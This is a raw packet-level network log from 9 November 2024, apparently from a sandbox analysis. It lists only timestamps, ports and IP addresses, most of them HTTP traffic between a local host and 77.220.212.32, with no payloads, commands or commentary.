Nov 9, 2024 02:47:35.981482983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981496096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981508017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981518984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981549025 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981570005 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981573105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981585979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981601954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981614113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981631041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981647968 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981705904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981718063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981728077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981738091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981746912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981750011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981761932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981781960 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981791019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981802940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981811047 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981815100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.981828928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.981857061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982249975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982261896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982273102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982306004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982322931 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982325077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982338905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982355118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982364893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982376099 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982402086 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982439995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982451916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982469082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982480049 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982482910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982495070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982505083 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982506037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982534885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982547998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982678890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982691050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982701063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982712030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982728004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982731104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982743979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982753992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982763052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982764959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982779026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982784033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982791901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982803106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982805967 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982815981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982826948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982830048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982840061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982842922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982852936 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982867002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982872963 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982881069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982904911 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982927084 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.982934952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.982990026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983026028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983062029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983105898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983110905 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983120918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983175993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983237982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983249903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983259916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983269930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983285904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983287096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983300924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983303070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983319998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983331919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983342886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983344078 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983377934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983378887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983390093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983393908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983445883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983458996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983464003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983469009 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983479023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983489037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983500957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983505011 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983520031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983532906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983537912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983544111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983556032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983563900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983566999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983577967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983588934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983591080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983612061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983642101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983666897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983697891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983710051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983714104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983721972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983731985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983736038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983746052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.983757019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983792067 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.983822107 CET	443	53056	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.983887911 CET	443	53056	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.984066010 CET	53056	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.984463930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984481096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984493017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984504938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984515905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984527111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984530926 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.984541893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984558105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984570026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984572887 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.984580994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984592915 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984596014 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.984603882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984616995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984616995 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.984628916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.984649897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.984678030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.985294104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985304117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985316992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985337019 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985346079 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.985348940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985359907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985369921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985380888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.985382080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985394001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985397100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.985405922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985423088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985424042 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.985435963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985440969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.985450983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985461950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985469103 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.985472918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985486031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.985505104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.985518932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.987575054 CET	53056	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.987595081 CET	443	53056	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.009170055 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.009207010 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.009341955 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.011960983 CET	53068	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.011976004 CET	443	53068	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.041038990 CET	53059	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:36.041047096 CET	53060	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:36.041064024 CET	53062	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:36.041069984 CET	443	53062	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:36.056452036 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.056479931 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.056519032 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.056576967 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.056624889 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.065546989 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.065560102 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.065570116 CET	53058	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.065577030 CET	443	53058	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.069655895 CET	53069	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.069674015 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.069818020 CET	53069	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.070076942 CET	53069	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:36.070086956 CET	443	53069	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:36.073734045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.073748112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.073760033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.073822021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.073822021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.088881016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.088891983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.088903904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.088920116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.088946104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.088967085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.092685938 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:36.093449116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.093461037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.093471050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.093516111 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.093525887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.093545914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.093554020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.093558073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.093559980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.093564987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.093588114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.093616962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.094317913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094338894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094343901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094355106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094361067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094362974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094383001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.094397068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094408989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094423056 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.094427109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094434023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.094440937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094453096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094463110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.094464064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094476938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094487906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.094490051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.094513893 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.094542027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095614910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095627069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095637083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095668077 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095691919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095757008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095769882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095781088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095792055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095803022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095809937 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095814943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095827103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095837116 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095839977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095851898 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095853090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095865011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095876932 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095876932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095887899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095892906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095904112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095916033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095925093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095927954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095940113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095942020 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095953941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095964909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095968962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.095977068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095988035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095999002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.095999956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096010923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096018076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096023083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096035957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096041918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096060038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096072912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096705914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096719027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096729040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096748114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096752882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096766949 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096771002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096784115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096791983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096796036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096817970 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096843958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096843958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096858025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096868992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096879959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096890926 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096899033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096925020 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096936941 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.096968889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096982002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.096992016 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097003937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097009897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097017050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097026110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097029924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097040892 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097074032 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097104073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097121954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097132921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097145081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097156048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097160101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097170115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097177982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097188950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097203016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097230911 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097265959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097278118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097287893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097299099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097311020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097313881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097322941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097333908 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097341061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097352028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.097354889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097367048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.097377062 CET	52982	80	192.168.2.7	77.220.212.32
